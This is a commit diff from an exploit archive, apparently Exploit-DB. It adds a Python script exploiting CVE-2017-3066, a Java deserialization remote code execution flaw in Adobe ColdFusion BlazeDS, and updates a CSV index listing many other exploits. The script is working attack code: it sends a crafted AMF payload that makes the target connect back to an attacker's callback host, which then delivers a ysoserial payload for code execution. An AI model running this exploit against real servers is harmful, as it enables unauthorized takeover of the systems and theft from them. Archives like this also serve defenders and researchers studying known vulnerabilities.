exploits/windows/remote/43993.py Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote
# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary payload for RCE.
import struct
import sys
import requests
if len(sys.argv) != 5:
print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
quit()
target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
'\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
struct.pack('>I', int(callback_port)) + \
'\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)

36
files_exploits.csv
View file

@ -5369,7 +5369,7 @@ id,file,description,date,author,type,platform,port
40959,exploits/multiple/dos/40959.c,"Apple macOS 10.12.1 / iOS < 10.2 - syslogd Arbitrary Port Replacement",2016-12-22,"Google Security Research",dos,multiple,
40964,exploits/windows/dos/40964.py,"XAMPP Control Panel - Denial Of Service",2016-12-25,hyp3rlinx,dos,windows,
40965,exploits/windows/dos/40965.py,"FTPShell Server 6.36 - '.csv' Local Denial of Service",2016-12-26,"sultan albalawi",dos,windows,
40985,exploits/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,linux,
40985,exploits/hardware/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,dos,hardware,
40994,exploits/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",dos,multiple,
40996,exploits/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",dos,php,
41008,exploits/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (1)",2017-01-11,COSIG,dos,multiple,
@ -5393,7 +5393,7 @@ id,file,description,date,author,type,platform,port
41215,exploits/multiple/dos/41215.html,"Apple WebKit - 'HTMLKeygenElement' Type Confusion",2017-02-01,"Google Security Research",dos,multiple,
41216,exploits/multiple/dos/41216.html,"Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled",2017-02-01,"Google Security Research",dos,multiple,
41218,exploits/android/dos/41218.txt,"Google Android - RKP Information Disclosure via s2-remapping Physical Ranges",2017-02-01,"Google Security Research",dos,android,
41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,
41219,exploits/hardware/dos/41219.txt,"QNAP NVR/NAS Devices - Buffer Overflow (PoC)",2017-02-01,bashis,dos,hardware,
41222,exploits/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",dos,windows,
41232,exploits/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",dos,android,
41278,exploits/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,dos,openbsd,80
@ -5488,6 +5488,10 @@ id,file,description,date,author,type,platform,port
43968,exploits/php/dos/43968.py,"WordPress Core - 'load-scripts.php' Denial of Service",2018-02-05,"Barak Tawily",dos,php,
42341,exploits/windows/dos/42341.c,"Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC)",2017-10-27,"Ivan Ivanovic",dos,windows,
43972,exploits/multiple/dos/43972.txt,"Claymore Dual GPU Miner 10.5 - Format String",2018-02-05,res1n,dos,multiple,3333
43986,exploits/hardware/dos/43986.py,"Cisco ASA - Crash PoC",2018-02-07,"Sean Dillon",dos,hardware,
43992,exploits/multiple/dos/43992.py,"Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption",2018-02-07,"Juan Sacco",dos,multiple,2000
43996,exploits/android/dos/43996.txt,"Android - 'getpidcon' Permission Bypass in KeyStore Service",2018-02-07,"Google Security Research",dos,android,
43998,exploits/multiple/dos/43998.txt,"Multiple OEM - 'nsd' Remote Stack Format String (PoC)",2017-12-14,bashis,dos,multiple,
41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@ -5887,7 +5891,7 @@ id,file,description,date,author,type,platform,port
186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,local,linux,
193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,local,linux,
197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",local,solaris,
199,exploits/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,local,hp-ux,
199,exploits/hp-ux/local/199.c,"HP-UX 11.0 - 'pppd' Local Stack Buffer Overflow",2000-11-20,K2,local,hp-ux,
200,exploits/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,local,bsd,
202,exploits/bsd/local/202.c,"BSDi 3.0/4.0 - 'rcvtty[mh]' Local Privilege Escalation",2000-11-21,vade79,local,bsd,
203,exploits/linux/local/203.sh,"vixie-cron - Local Privilege Escalation",2000-11-21,"Michal Zalewski",local,linux,
@ -5941,7 +5945,7 @@ id,file,description,date,author,type,platform,port
331,exploits/linux/local/331.c,"LibXt - 'XtAppInitialize()' Local Overflow *xterm",1997-05-14,"Ming Zhang",local,linux,
332,exploits/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps / chkey - Data Buffer",1997-05-19,"Joe Zbiciak",local,solaris,
333,exploits/aix/local/333.c,"AIX 4.2 - '/usr/dt/bin/dtterm' Local Buffer Overflow",1997-05-27,"Georgi Guninski",local,aix,
334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix,
334,exploits/irix/local/334.c,"SGI IRIX - 'LsD' Multiple Local Buffer Overflows",1997-05-25,LSD-PLaNET,local,irix,
335,exploits/aix/local/335.c,"AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation",1997-05-26,"Georgi Guninski",local,aix,
336,exploits/irix/local/336.c,"SGI IRIX - '/bin/login' Local Buffer Overflow",1997-05-26,"David Hedley",local,irix,
337,exploits/irix/local/337.c,"IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation",1997-05-27,"David Hedley",local,irix,
@ -6039,7 +6043,7 @@ id,file,description,date,author,type,platform,port
877,exploits/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 - Local Buffer Overflow",2005-03-14,"Kevin Finisterre",local,linux,
884,exploits/windows/local/884.cpp,"iSnooker 1.6.8 - Local Password Disclosure",2005-03-16,Kozan,local,windows,
885,exploits/windows/local/885.cpp,"iPool 1.6.81 - Local Password Disclosure",2005-03-16,Kozan,local,windows,
890,exploits/linux/local/890.pl,"PostScript Utilities - 'psnup' Argument Buffer Overflow",2005-03-21,lammat,local,linux,
890,exploits/linux/local/890.pl,"PostScript Utilities - 'psnup' Local Buffer Overflow",2005-03-21,lammat,local,linux,
895,exploits/linux/local/895.c,"Linux Kernel 2.4.x/2.6.x - 'uselib()' Local Privilege Escalation (3)",2005-03-22,sd,local,linux,
896,exploits/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation",2005-03-22,vade79,local,osx,
898,exploits/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,local,aix,
@ -6178,7 +6182,7 @@ id,file,description,date,author,type,platform,port
2065,exploits/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow",2006-07-23,"Luigi Auriemma",local,windows,
2067,exploits/solaris/local/2067.c,"Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1)",2006-07-24,prdelka,local,solaris,
2091,exploits/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution",2006-07-30,NSRocket,local,windows,
2094,exploits/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows",2006-07-31,"Luigi Auriemma",local,windows,
2094,exploits/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Local Buffer Overflows",2006-07-31,"Luigi Auriemma",local,windows,
2106,exploits/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
2107,exploits/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Local Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
2108,exploits/osx/local/2108.sh,"Apple Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",local,osx,
@ -9314,6 +9318,7 @@ id,file,description,date,author,type,platform,port
43971,exploits/linux/local/43971.rb,"Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)",2018-02-05,Metasploit,local,linux,
43973,exploits/windows/local/43973.c,"MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation",2018-02-05,"Souhail Hammou",local,windows,
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -15989,6 +15994,17 @@ id,file,description,date,author,type,platform,port
43936,exploits/windows/remote/43936.py,"Sync Breeze Enterprise 10.4.18 - Remote Buffer Overflow (SEH)",2018-02-01,"Daniel Teixeira",remote,windows,
43939,exploits/multiple/remote/43939.rb,"BMC Server Automation RSCD Agent - NSH Remote Command Execution (Metasploit)",2018-02-01,Metasploit,remote,multiple,
43970,exploits/windows/remote/43970.rb,"Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)",2018-02-05,Metasploit,remote,windows,
43982,exploits/hardware/remote/43982.txt,"Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow / Double Free / Unauthorized Access",2018-02-01,bashis,remote,hardware,
43983,exploits/hardware/remote/43983.py,"Geovision Inc. IP Camera & Video - Remote Command Execution",2018-02-01,bashis,remote,hardware,
43984,exploits/multiple/remote/43984.txt,"Axis SSI - Remote Command Execution / Read Files",2017-10-20,bashis,remote,multiple,
43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,
43993,exploits/windows/remote/43993.py,"Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution",2018-02-07,"Faisal Tameesh",remote,windows,
43997,exploits/hardware/remote/43997.py,"Herospeed - 'TelnetSwitch' Remote Stack Overflow / Overwrite Password / Enable TelnetD",2018-01-22,bashis,remote,hardware,787
43999,exploits/multiple/remote/43999.txt,"Uniview - Remote Command Execution / Export Config (PoC)",2017-10-28,bashis,remote,multiple,
44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,
44002,exploits/multiple/remote/44002.py,"Dahua Generation 2/3 - Backdoor Access",2017-05-02,bashis,remote,multiple,
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@ -16464,7 +16480,7 @@ id,file,description,date,author,type,platform,port
1567,exploits/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,webapps,php,
1569,exploits/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,webapps,asp,
1570,exploits/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,webapps,php,
1571,exploits/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorised Create Admin",2006-03-09,nukedx,webapps,asp,
1571,exploits/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorized Create Admin",2006-03-09,nukedx,webapps,asp,
1575,exploits/php/webapps/1575.pl,"Guestbook Script 1.7 - 'include_files' Remote Code Execution",2006-03-11,rgod,webapps,php,
1576,exploits/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,webapps,php,
1581,exploits/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,webapps,php,
@ -37989,6 +38005,12 @@ id,file,description,date,author,type,platform,port
43978,exploits/php/webapps/43978.txt,"Joomla! Component JSP Tickets 1.1 - SQL Injection",2018-02-05,"Ihsan Sencan",webapps,php,
43980,exploits/php/webapps/43980.txt,"Student Profile Management System Script 2.0.6 - Authentication Bypass",2018-02-05,L0RD,webapps,php,
43981,exploits/hardware/webapps/43981.txt,"Netis WF2419 Router - Cross-Site Scripting",2018-02-05,"Sajibe Kanti",webapps,hardware,
43988,exploits/php/webapps/43988.txt,"Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
43989,exploits/php/webapps/43989.txt,"Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
43990,exploits/php/webapps/43990.txt,"Naukri Clone Script - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
43991,exploits/php/webapps/43991.txt,"Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting",2018-02-07,"Prasenjit Kanti Paul",webapps,php,80
43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80
43995,exploits/php/webapps/43995.txt,"Entrepreneur Dating Script 2.0.2 - Authentication Bypass",2018-02-07,L0RD,webapps,php,80
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80

Can't render this file because it is too large.